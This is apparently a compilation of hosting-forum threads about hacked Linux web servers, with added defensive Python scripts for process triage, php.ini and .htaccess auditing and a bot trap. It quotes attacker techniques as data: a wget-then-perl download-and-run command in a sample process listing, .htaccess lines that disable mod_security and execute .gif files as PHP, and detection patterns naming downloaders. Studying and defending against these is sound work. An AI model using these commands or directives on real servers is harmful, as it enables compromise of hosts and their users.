apache   22442     1 10 03:51 ?        00:20:33 [httpd]
apache   22513 21445  0 03:55 ?        00:00:00 [perl] <defunct>
apache   22515     1  0 03:55 ?        00:00:00 /usr/local/apache/bin/nscan -DSSL
apache   22552  2220  0 03:58 ?        00:00:00 /usr/sbin/httpd
apache   23183     1  0 04:03 ?        00:00:48 /usr/local/apache/bin/nscan -DSSL
apache   23187     1  0 04:03 ?        00:00:47 /usr/local/apache/bin/nscan -DSSL
apache    3606  2220  0 04:52 ?        00:00:00 /usr/sbin/httpd
apache   27716     1  0 06:54 ?        00:00:00 [httpd]
apache   27720     1  0 06:54 ?        00:00:00 ./php
apache   28140     1  0 07:06 ?        00:00:00 /bin/sh ./mass 139
apache   28299 28140  0 07:12 ?        00:00:00 /bin/bash ./a 139.1
apache   28302 28299  9 07:12 ?        00:00:20 /bin/bash 139.1 22
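A process listing like the one above can be triaged mechanically. Under the web server user, the things that should not exist are: anything that is not the httpd binary; anything reparented to PID 1 (a daemonised child whose spawning worker has already exited, like the shellbot and [httpds] entries); anything whose command line is shown in brackets (a user-space process with an emptied argv, dressed up to look like a kernel thread; real kernel threads run as root); and any [sh] or [perl] <defunct> zombie whose parent is an httpd worker, which means that worker ran a shell. The following is an added example, not the poster's code: it parses `ps -fe` output and applies those four rules. The sample lines are modelled on the listing above with [url] kept as a placeholder, and the allow-list of genuine httpd paths is an assumption to adapt to the host.

```python
import re
import sys

PS_FIELDS = ("uid", "pid", "ppid", "c", "stime", "tty", "time", "cmd")

# Constructed sample modelled on the listing in the post above; [url] is a
# placeholder, not a real address.
SAMPLE_PS = """\
UID        PID  PPID  C STIME TTY          TIME CMD
root      2220     1  0 Dec26 ?        00:00:03 /usr/sbin/httpd
apache    2889  2220  1 Dec26 ?        00:18:36 /usr/sbin/httpd
apache    2894  2220  0 Dec26 ?        00:00:00 /usr/sbin/httpd
apache   32714     1  0 Dec26 ?        00:00:02 /apache/bin/httpd
apache   19751  2894  0 Dec26 ?        00:00:00 [sh] <defunct>
apache   19764     1 23 Dec26 ?        03:31:35 shellbot
apache   20838     1 13 Dec26 ?        01:21:35 [httpds]
apache   13780     1  0 02:28 ?        00:00:00 [httpds]
apache   13781 13780  0 02:28 ?        00:00:00 sh -c wget [url] -O test.txt
apache   13798 13781  0 02:29 ?        00:00:00 perl test.txt
apache   22515     1  0 03:55 ?        00:00:00 /usr/local/apache/bin/nscan -DSSL
apache   28140     1  0 07:06 ?        00:00:00 /bin/sh ./mass 139
"""


def parse_ps(text):
    """Parse `ps -fe` output into dicts keyed by PS_FIELDS (CMD keeps its spaces)."""
    procs = []
    for line in text.splitlines():
        parts = line.strip().split(None, 7)
        if len(parts) != 8 or parts[0] == "UID":
            continue
        procs.append(dict(zip(PS_FIELDS, parts)))
    return procs


def find_suspicious(procs, web_user="apache", allowed=("/usr/sbin/httpd",)):
    """Return [(pid, cmd, [reasons])] for web_user processes that should not exist.

    `allowed` is an assumption: the real httpd binary path(s) on this host.
    """
    findings = []
    for p in procs:
        if p["uid"] != web_user:
            continue
        cmd = p["cmd"]
        reasons = []
        if cmd.endswith("<defunct>"):
            # A zombie [sh]/[perl] under a worker means that worker ran a shell.
            reasons.append("zombie shell child of worker %s" % p["ppid"])
        elif cmd.split()[0] in allowed:
            continue
        else:
            reasons.append("not the web server binary")
            if p["ppid"] == "1":
                reasons.append("reparented to init (daemonised)")
            if re.fullmatch(r"\[[^\]]+\]", cmd):
                reasons.append("bracketed name: empty argv, masquerading as a kernel thread")
            if re.search(r"\b(wget|curl|perl|python|sh -c)\b", cmd):
                reasons.append("downloader/interpreter launched by the web user")
        findings.append((int(p["pid"]), cmd, reasons))
    return findings


if __name__ == "__main__":
    # On a live box:  ps -fe | python triage_ps.py -     (no argument: the sample)
    text = sys.stdin.read() if len(sys.argv) > 1 and sys.argv[1] == "-" else SAMPLE_PS
    for pid, cmd, reasons in find_suspicious(parse_ps(text)):
        print(f"{pid:6d}  {cmd:45s}  {'; '.join(reasons)}")
```

Flagging by parent and argv rather than by name is the point: the listing above shows the same malware as shellbot, [httpds], [httpd] and /apache/bin/httpd, and a name-based check would miss three of the four.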
Hackers
We are rookies, and we are being attacked by hackers for the second time in as many weeks. I can see them in the shell right now on multiple servers. I cannot remember, in all the excitement, how to take away their root access. How do I stop them from doing any more damage?
GoDaddy Masking Is Killing My Site - Alternative?
So we've got a client set up with 2 domains: 1 main and 1 secondary. The secondary domain is a 301 redirect with masking through GoDaddy. The reason for the masking is that we need the domain name to stay the same after the redirect (so people who come in on DomainB will only see DomainB in the URL bar). The problem: GoDaddy uses a "zero frame" element to implement the masking, and it's messing up the display of our site. Note: the display only screws up in IE. Primary domain: www.BristolCountyWomensJournal.com --> (This works fine.) 301 domain: www.WomensJournals.com --> (Check out the messy background!) Anyone know of alternatives to domain masking?
Determine What Cron Jobs Are Killing Server And When
We're running on Linux/Apache/MySQL/RoR and have a number of cron jobs that run throughout the day on our server. We've been noticing lately that at certain times of the day the site becomes really slow. When I'm online with my engineers I can mention this to them, and they can check and say "Oh yeah, it's job XYZ that's spiking the server load." That's great, but much of the time when I notice the sluggishness my developers are offline (we're in different time zones). I'm wondering if there's a fairly easy way to track this when they're not online, so we can say "Yup, last night at 10 PM your time, when you noticed that, it was job ABC." There has to be something that allows you to do this, right?
Hackers On My Server
Twice in about a week, maybe 2 weeks, my server provider has sent me spoof abuse messages about accounts on my server. These phishing pages first linked to a bank, then PayPal. These phishing pages were placed on 2 different accounts, and the accounts belong to people I've known for a very long time who wouldn't have any idea how to do this, so I know it's a hacker getting in somehow. How can I stop this from happening? Any programs that I can run on the server? Heck, even which log files to check to see where these attacks are coming from would help, as I could block the IPs. I'm running cPanel as well, if that helps; I use CSF. I don't want to have to move servers, as that would take a very long time for me.
Chinese Hackers
My PR4 site has been hacked by Chinese hackers. They fortunately did not do anything exceptionally terrible, but the site was down, they altered the SERPs results, and now my inbox (operating from SquirrelMail) is receiving even more spam than before. A network expert suggested that my server would now be being used for sending spam. And my company, who will remain nameless ATM, seem to claim that no server is safe from hackers under any circumstances. I would like to copy to you the company's response to my questions, and I would hope for a word or two of inspiration and encouragement from you. The second string in each question is the server company's response.
1. Please quote me for checking to see if the server is being used for spam and blocking this from happening.
We could certainly check and see if your server is currently sending out any spam and try to identify where it is originating from. Depending on the issue, a fix may be required by your developers.
2. Running a check on the site's code to see if there have been any amendments to the coding on the site.
We can check and see if there has been any FTP access and look at file modification dates; this would hopefully pick up any issues.
3. Making sure the server is safe and that all China IP ranges are banned.
Whilst we cannot ban all Chinese ranges, as we do not know all the ranges China uses, we can lock FTP and SSH access to certain ranges only; you would need to provide these ranges.
4. Applying a second level of security to stop a spammer from hacking the system (however, I am sure I already have anti-virus and spyware protection on the server).
I'm not sure you do have any anti-virus/spyware on your server; it is certainly not something we install. I don't really believe either of those tools would stop someone hacking the server either; Linux servers don't really get affected by that. We could run a rootkit checker, which checks for backdoors and modification of the operating system files.
We would also suggest making sure the scripts are secure and that any web interface (admin area) logins have secure passwords and are also IP restricted. For the work above we would charge 1 hour support at £150 per hour ex VAT.
How Prevent Hackers Away
I am giving a few tips on securing your server against hack attempts. You must check these in spite of other security measures like firewalls, rootkit detectors etc.
1. Most important: do not disable safe_mode in php.ini. If any customer asks to disable it, turn it off for his account only, not for the whole server. Most of the time the attack is done using a c99 shell (phpshell) script. If safe_mode is off on the server and there are public dirs with 777 permissions, he can easily hack through.
2. Compile Apache with safe mode as well.
3. In cPanel, under Tweak Settings, turn on base_dir; if someone requests to turn it off, turn it off for his/her account only. Using a phpshell one can easily move to main server dirs like /etc, /home.
4. Do not allow anonymous FTP on your server. You can turn it off from the FTP config under WHM Service Configuration. If it's allowed, one can easily bind a port on your server using the nc tool and gain root access. Always keep it disabled.
5. Make sure /tmp is secured. You can easily do that by running the command /scripts/securetmp via SSH. But do make sure /tmp is secured, else one can upload some kind of Perl script to the /tmp dir and deface or damage all the data in a few/all of the accounts on your server.
Keeping your server secure from hack attempts.
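The tips above are mostly php.ini settings, and a short script can check a php.ini for them instead of trusting memory or a phpinfo() page. The following is an added example (mine, not the poster's): it parses a php.ini and reports the directives this thread keeps coming back to, safe_mode, open_basedir and disable_functions (the last one raised in the mod_security post earlier), plus allow_url_include, allow_url_fopen, register_globals and expose_php, which are the settings classic shell uploads and remote-inclusion bugs rely on. One caveat the post predates: safe_mode and register_globals were removed in PHP 5.4, so the check takes the PHP version as a parameter, and from 5.4 on only open_basedir and disable_functions count. The two php.ini fragments are constructed samples; the list of functions to disable is my baseline.

```python
# Functions a PHP shell needs in order to run commands; assumption: a sensible
# baseline for shared hosting, extend as needed.
DANGEROUS_FUNCTIONS = ("exec", "passthru", "shell_exec", "system", "proc_open", "popen")

# Constructed sample php.ini fragments (not from any real server).
WEAK_INI = """\
[PHP]
safe_mode = Off
open_basedir =
disable_functions =
allow_url_fopen = On
allow_url_include = On
register_globals = On
expose_php = On
"""

HARDENED_INI = """\
[PHP]
safe_mode = On   ; only honoured by PHP < 5.4
open_basedir = "/home/:/tmp/:/usr/local/lib/php/"
disable_functions = exec,passthru,shell_exec,system,proc_open,popen
allow_url_fopen = Off
allow_url_include = Off
register_globals = Off
expose_php = Off
"""


def parse_php_ini(text):
    """Minimal php.ini reader: drops [sections] and ; comments, returns {directive: value}."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip().lower()] = value.strip().strip('"').strip("'")
    return settings


def is_on(value):
    """php.ini booleans: 1/On/Yes/True are on, everything else is off."""
    return value.strip().lower() in ("1", "on", "yes", "true")


def audit(settings, php_version=(5, 2)):
    """Return [(severity, directive, message)] for the shell-relevant directives."""
    findings = []
    if php_version < (5, 4):
        if not is_on(settings.get("safe_mode", "0")):
            findings.append(("WARN", "safe_mode",
                             "off server-wide; keep it on and relax it per account"))
    elif "safe_mode" in settings:
        findings.append(("INFO", "safe_mode",
                         "removed in PHP 5.4: this line does nothing, rely on open_basedir and disable_functions"))
    if not settings.get("open_basedir"):
        findings.append(("WARN", "open_basedir",
                         "unset: scripts may read any path the web server user can, including other accounts"))
    disabled = {f.strip() for f in settings.get("disable_functions", "").split(",") if f.strip()}
    missing = [f for f in DANGEROUS_FUNCTIONS if f not in disabled]
    if missing:
        findings.append(("WARN", "disable_functions", "still allows " + ", ".join(missing)))
    if is_on(settings.get("allow_url_include", "0")):
        findings.append(("WARN", "allow_url_include",
                         "on: include() of a remote URL lets a file-inclusion bug pull in a shell"))
    if is_on(settings.get("allow_url_fopen", "1")):
        findings.append(("INFO", "allow_url_fopen",
                         "on: scripts can fetch remote files; turn off if no application needs it"))
    if php_version < (5, 4) and is_on(settings.get("register_globals", "0")):
        findings.append(("WARN", "register_globals",
                         "on: request parameters become variables, a classic inclusion-bug enabler"))
    if is_on(settings.get("expose_php", "1")):
        findings.append(("INFO", "expose_php", "on: PHP version advertised in response headers"))
    return findings


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:   # python audit_php_ini.py /usr/local/lib/php.ini 5.2
        text = open(sys.argv[1]).read()
        version = tuple(int(x) for x in sys.argv[2].split(".")) if len(sys.argv) > 2 else (5, 2)
        report = {sys.argv[1]: audit(parse_php_ini(text), version)}
    else:
        report = {"weak sample": audit(parse_php_ini(WEAK_INI)),
                  "hardened sample": audit(parse_php_ini(HARDENED_INI))}
    for label, findings in report.items():
        print(label, "->", "clean" if not findings else "")
        for severity, directive, message in findings:
            print(f"  {severity:4s} {directive}: {message}")
```

Note that disable_functions only restricts PHP; it does nothing against a Perl script dropped in /tmp (tip 5 above), which is why the /tmp noexec mount and the permission checks are separate controls.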
Hackers..spammers..
I've been on yet another crusade this morning, and have a few questions for the, umm, "general" hosting audience. We live in odd times. If you had told me a few years ago that script kiddies might be able to completely compromise a server via PHP, or that spammers would be using the web server *itself* to send spam, I would have laughed. This is no laughing matter. A concept of privacy comes into play, and I'm curious how many of you handle it. Joe pays me for an account, agrees to my TOS/AUP, and starts uploading files. The way I see it, we have many ways of dealing with scripts that do bad things. It seems to me, though, this may be considered "spying" on our customers. If we have a script, say, that runs every fifteen minutes and looks for these scripts, wouldn't that be considered spying? Or would this be something we should just bury in our AUP/TOS, that this might happen? I have read and agreed to quite a few of those AUP/TOS things, and I can't remember even one time even a mention that files that I upload to the server may be scanned or inspected before allowing the file to be placed on the server. Never, not once. However, this may have changed. If you've ever tried to get even a simple Perl script to work on a cPanel server, you probably understand that many safeguards are there for the sake of everybody else on the server, and may prevent you from doing what you want to do with the script(s). At the same time, though, it seems to fly in the face of common sense that many script packages available today are inherently insecure. Chmod 777 files and directories? Even in the times we live in today, when we know this is a very, very bad idea? Yet there seem to be even more like this today than ever before. I mention this from first-hand experience. One of the many magazines I get had an article detailing the trials the author was having trying to get Simple Groupware working on a VPS.
Yesterday I noticed a post from a person wanting something installed on a production server. Not only was the program a beta, but, just like Simple Groupware, it looked horribly insecure. In retrospect, I can remember the very first PHP script I ever used. The year was 1996, and this was my first cPanel shared account. I even remember having to add *.php to the MIME types. It installed without a hitch, and, coming from the Perl world I had spent many years in, and many hours getting those scripts to work, it seemed almost like a miracle. It seems, as hosts, there are a few ways we can go at this.
1) Modify the FTP server so it inspects files
2) Have a program that looks for things, much like rkhunter does.
3) A front-end for all scripts, perhaps MySQL as well, that enforces rulesets for restricted content or resource allocations.
Nobody Account Being Used By Hackers
One of my servers, which hosts 200 domains, is being attacked by hacker(s). It seems any world-writable files are being replaced or modified by the Linux account nobody. How can I secure this account? Is it safe to change the password? I know many processes depend on using the nobody account to run.
Save My Site From Hackers
My site is going down a lot of times due to high CPU quota, and when I check the CPU exceeded logs I can see some IP addresses trying to open non-existent permalinks, i.e. my site is smartdesis.com and they try to open smartdesis.com/xxx, which gives a 404 error and is causing high CPU usage. Repeatedly they are trying to open different URLs by appending /xxx to them; I banned nearly 100 IPs but they seem to be growing.
Autoban Hackers Searching For Phpmyadmin
I've seen perl scripts able to achieve this, so I am wondering if a tool similar to this has been released to work with APF / Iptables? The script in question is a "bot trap" and you put a deny rule in robots.txt to a hidden file. In that file, the script records the offending IP and blocks it in htaccess (once the file in question is hit by a bot/person). Getting a bit tired of seeing these morons always searching for: /phpmyadmin /pma etc, etc.
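A minimal version of the bot trap the post above describes, written as an added example rather than the Perl script mentioned there: robots.txt disallows a hidden path, and any client that still requests it gets a "Deny from" rule appended to .htaccess. The trap path, the skipped private ranges and the .htaccess layout are assumptions; REMOTE_ADDR is validated as an IP before anything is written, so a malformed value cannot inject other directives.

```python
import ipaddress
import re
from pathlib import Path

TRAP_PATH = "/secret-trap/"          # assumed: the path listed as Disallow in robots.txt
DENY_LINE = re.compile(r"^\s*Deny\s+from\s+(\S+)\s*$", re.I)

def robots_txt(trap_path=TRAP_PATH):
    """robots.txt that tells well-behaved crawlers to stay out of the trap."""
    return f"User-agent: *\nDisallow: {trap_path}\n"

def banned_ips(htaccess_text):
    """Set of addresses already blocked by 'Deny from' lines."""
    return {m.group(1) for m in map(DENY_LINE.match, htaccess_text.splitlines()) if m}

def record_hit(remote_addr, htaccess_text, skip=("127.0.0.0/8", "10.0.0.0/8")):
    """Return (new_htaccess_text, banned) for one request that hit the trap.
    Only a syntactically valid address outside the skip ranges is ever written,
    so the untrusted REMOTE_ADDR string cannot smuggle in other directives."""
    try:
        ip = ipaddress.ip_address(remote_addr.strip())
    except ValueError:
        return htaccess_text, False
    if any(ip in ipaddress.ip_network(n) for n in skip):
        return htaccess_text, False          # never lock out your own monitoring hosts
    if str(ip) in banned_ips(htaccess_text):
        return htaccess_text, False          # already blocked, nothing to add
    if htaccess_text and not htaccess_text.endswith("\n"):
        htaccess_text += "\n"
    return htaccess_text + f"Deny from {ip}\n", True

def handle_trap_request(remote_addr, htaccess_file):
    """CGI-style entry point: update the .htaccess on disk, report whether a ban was added.
    'Order Allow,Deny' makes the appended Deny lines win over 'Allow from all'."""
    p = Path(htaccess_file)
    text = p.read_text() if p.exists() else "Order Allow,Deny\nAllow from all\n"
    new_text, banned = record_hit(remote_addr, text)
    if banned:
        p.write_text(new_text)
    return banned
```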
Stop Hackers From Disabling Mod_security
I have a problem with a hacker that uses .htaccess to disable mod_security using this code:

    <IfModule mod_security.c>
    SecFilterEngine Off
    SecFilterScanPOST Off
    </IfModule>

So is there a way to stop this? Also they have come up with a smart way to run shell files named as images using this code in .htaccess:

    AddType application/x-httpd-php .gif

Is there a way to disable the "AddType application"?
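The two .htaccess directives quoted in the post above, together with the world-writable (777) directories the server-hardening tips earlier on this page warn about, can be found with a small audit script run over the web root. This is an added example, not code from any of the posters; the mod_security 2 directive name SecRuleEngine, the list of legitimate PHP extensions and the throwaway web root built under a temp directory are assumptions.

```python
import os
import re
import stat
import tempfile
from pathlib import Path
# SecFilterEngine/SecFilterScanPOST are the 1.x names quoted in the post; SecRuleEngine is the 2.x name.
MODSEC_OFF = re.compile(r"^\s*Sec(FilterEngine|FilterScanPOST|RuleEngine)\s+Off\b", re.I)
# AddType/AddHandler lines that route some extension to the PHP handler.
PHP_HANDLER = re.compile(r"^\s*(?:AddType|AddHandler)\s+application/x-httpd-php\S*\s+(.+)$", re.I)
PHP_EXTENSIONS = {".php", ".phtml", ".php5"}   # extensions expected to run as PHP (assumed)

def audit_htaccess_text(text, path=".htaccess"):
    """Return (path, line_no, reason) for each suspicious directive in one .htaccess."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if MODSEC_OFF.match(line):
            findings.append((path, n, "mod_security disabled: " + line.strip()))
        m = PHP_HANDLER.match(line)
        if m:
            odd = [e for e in m.group(1).split() if e.lower() not in PHP_EXTENSIONS]
            if odd:  # e.g. ".gif" mapped to PHP, so an uploaded "image" executes
                findings.append((path, n, "PHP handler for " + " ".join(odd)))
    return findings

def audit_tree(root):
    """Walk a web root; flag world-writable dirs and suspicious .htaccess files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if os.stat(dirpath).st_mode & stat.S_IWOTH:
            findings.append((dirpath, 0, "world-writable directory (chmod 777)"))
        if ".htaccess" in files:
            p = Path(dirpath, ".htaccess")
            findings.extend(audit_htaccess_text(p.read_text(errors="replace"), str(p)))
    return findings

# Constructed sample .htaccess reproducing the two directives quoted in the post.
SAMPLE_HTACCESS = """<IfModule mod_security.c>
    SecFilterEngine Off
    SecFilterScanPOST Off
</IfModule>
AddType application/x-httpd-php .gif
AddType application/x-httpd-php .php
"""

def demo():
    root = tempfile.mkdtemp()              # throwaway web root with a 777 uploads dir
    uploads = Path(root, "uploads")
    uploads.mkdir()
    uploads.chmod(0o777)
    Path(uploads, ".htaccess").write_text(SAMPLE_HTACCESS)
    return audit_tree(root)                # 4 findings: the 777 dir plus three directives
```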
Executing ./ Commands Through Hackers Shells
I've been concerned about executing commands through (./) using PHP and Perl shells on the server. A new way of hacking these days is using Perl shells; even if Perl was terminated on the server, or was forbidden for users, hackers upload a (perl) program to the server to use it instead of the server's own Perl. Anyway, chmoding (ls, cat, more, less) to 4750 seems to give "permission denied" when executing these programs on the server, but the hackers also found that they could upload their own ls/cat/more/less programs and use them instead of the server's. They also could rename them, ls ==> ki or anything, and use them like this: ./ki /etc/valiases -alXrt, and the commands work like a charm for them. ./ <<--- this command uses the sh program on the server (sh, which refers to bash on most servers), so ./ki is the same as sh ki and bash ki. So I tried chmoding sh with 4750 and that killed the exploit. I was concerned about cPanel's and the website's functionality, so I tried changing an account's password and creating a database; they both worked fine. So, if you think chmoding sh 4750 is a bad idea please let me know, and if you know any other ways of disabling all the Perl scripts on the server.
ThePlanet.com Permitting Hackers Or Just Incompetent
ThePlanet.com permitting hackers or just incompetent? It sort of seems that way. I noticed my former boss's site was redirecting to the searchportal.information.com linkfarm junk site. I knew this was not his site and took a closer look at the link that I saw when I visited his site. I use NoScript in Firefox and saw this as a link on his primary page that the script was trying to make me go to: [url] This script then redirects me to this junk site: [url]...BDlaBQlSAFADDw I would not recommend going there unless you have Firefox installed with NoScript along with Adblock Plus. Who knows what exactly this site may be trying to do. Anyway, I noticed this was happening and took a look at the source of my boss's site as it is now and this is what I get:

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
    <html>
    <head>
    <BODY>
    <script type="text/javascript">
    <!--
    window.location = [url]
    //-->
    </script>
    </BODY>
    </HTML>

So JavaScript is being executed which executes that code located on ThePlanet.com's service. Using the IP address that is hosting the script, I did a DNS check and came up with this: [url]

Quote:
OrgName: ThePlanet.com Internet Services, Inc.
OrgID: TPCM
Address: 315 Capitol
Address: Suite 205
City: Houston
StateProv: TX
PostalCode: 77002
Country: US
ReferralServer: rwhois://rwhois.theplanet.com:4321
NetRange: 216.40.192.0 - 216.40.255.255
CIDR: 216.40.192.0/18
OriginAS: AS13749, AS13884, AS21844, AS30315
OriginAS: AS36420
NetName: NETBLK-THEPLANET-BLK-EV1-5
NetHandle: NET-216-40-192-0-1
Parent: NET-216-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.EV1SERVERS.NET
NameServer: NS2.EV1SERVERS.NET
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 2000-10-05
Updated: 2008-02-28
OrgAbuseHandle: ABUSE271-ARIN
OrgAbuseName: The Planet Abuse
OrgAbusePhone: +1-281-714-3560
OrgAbuseEmail: abuse@theplanet.com
OrgNOCHandle: THEPL-ARIN
OrgNOCName: The Planet NOC
OrgNOCPhone: +1-281-714-3555
OrgNOCEmail: noc@theplanet.com
OrgTechHandle: TECHN33-ARIN
OrgTechName: Technical Support
OrgTechPhone: +1-214-782-7800
OrgTechEmail: admins@theplanet.com
# ARIN WHOIS database, last updated 2008-12-18 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

So I sent ThePlanet.com an email to Abuse@theplanet.com two days ago, which is what their tech support phone number told me to do. This is the email I sent two days ago, minus any information that would embarrass my former boss.

Quote:
> Hi,
>
> I was taking a look at my former employer's website to see if they had done anything new with it and I saw this happen today. The domain is website. I would not recommend you going to the site unless you are using Firefox for a browser and have the NoScript plugin installed. A perl script tries to automatically redirect with the domain of [url]. This script automatically forwards to [url].
>
> I think all that applies to you is that whoever owns the server or account with IP 216.40.254.78 has most likely been compromised. A support representative from your company said I must email you regarding this. I got the contact information from the IP address within the script by looking it up here: [url]. I also notice that the entire IP address is compromised. I have notified the owner of website as they use a different host (GoDaddy) and will need to have their hosting account cleaned up. I suppose it is also possible that someone is using your service for nefarious activities.
>
> If you have any further questions, please feel free to reply.
>
> Regards,
> Lee

This is the email I got just a few minutes ago from ThePlanet.com.

Quote:
On Thu, Dec 18, 2008 at 10:03 PM, <abuse@theplanet.com> wrote:
>
> Reference: [ThePlanetAbuse-C30396127D]
>
> Dear Sir or Madam,
>
> We appreciate you bringing this to our attention. We feel this issue has already been resolved, as we are unable to access the material in question.
>
> --
> Regards,
> Abuse Department
> The Planet
> abuse@theplanet.com
> [url]

Now if you take a look at the above perl script, it is still there, and going to that IP still executes that script and redirects you to the link farm. I replied with this just a few minutes ago.

Quote:
You do understand that when you go to the site of website.com it redirects to one of your servers with an IP of 216.40.254.78. The actual script that runs is this one: [url] This then redirects to a link farm located on [url]. You do know that IP is your IP and that it is still there? That IP is one of yours according to this: [url]

One of two things is happening here.
1. The person who hacked someone else's website (website.com) either owns the server with the IP address listed above or this person hacked this server, or
2. Your server is being used in illegal hacking activity to redirect visitors of other websites to a site whose only purpose is to make money through a link farm.

Either one of those above is unacceptable, and to say that the material doesn't exist on your own server when I can see it from here would be an inaccurate statement. When viewing the source of the website.com domain, this is the source HTML. This is very much using your server and hosting service to redirect unsuspecting users to a nefarious website.
OC3 Networks Supporting Scammers And Hackers And Hosting Warez
Yesterday andhrahost.com hacked our WHMCS and sent emails to many of our customers. Here is the screenshot: [url] [url] He also deleted all admin logs, but luckily I took this screenshot. Around 2 months back this also happened to us and we even informed OC3 about it, but that time also Mr Alex Ferrari from OC3 Networks replied to me and didn't take any action on it. We daily get spam from OC3 Networks IPs. Regularly they were trying to hack our WHMCS and yesterday they did it. I have even sent an email to OC3 Networks and this time also no reply from them, and the hacker/spammer server is still up and selling warez hosting, illegal hosting openly. Kindly guide me how to proceed to take action against OC3 Networks and against that hosting company which is doing this regularly.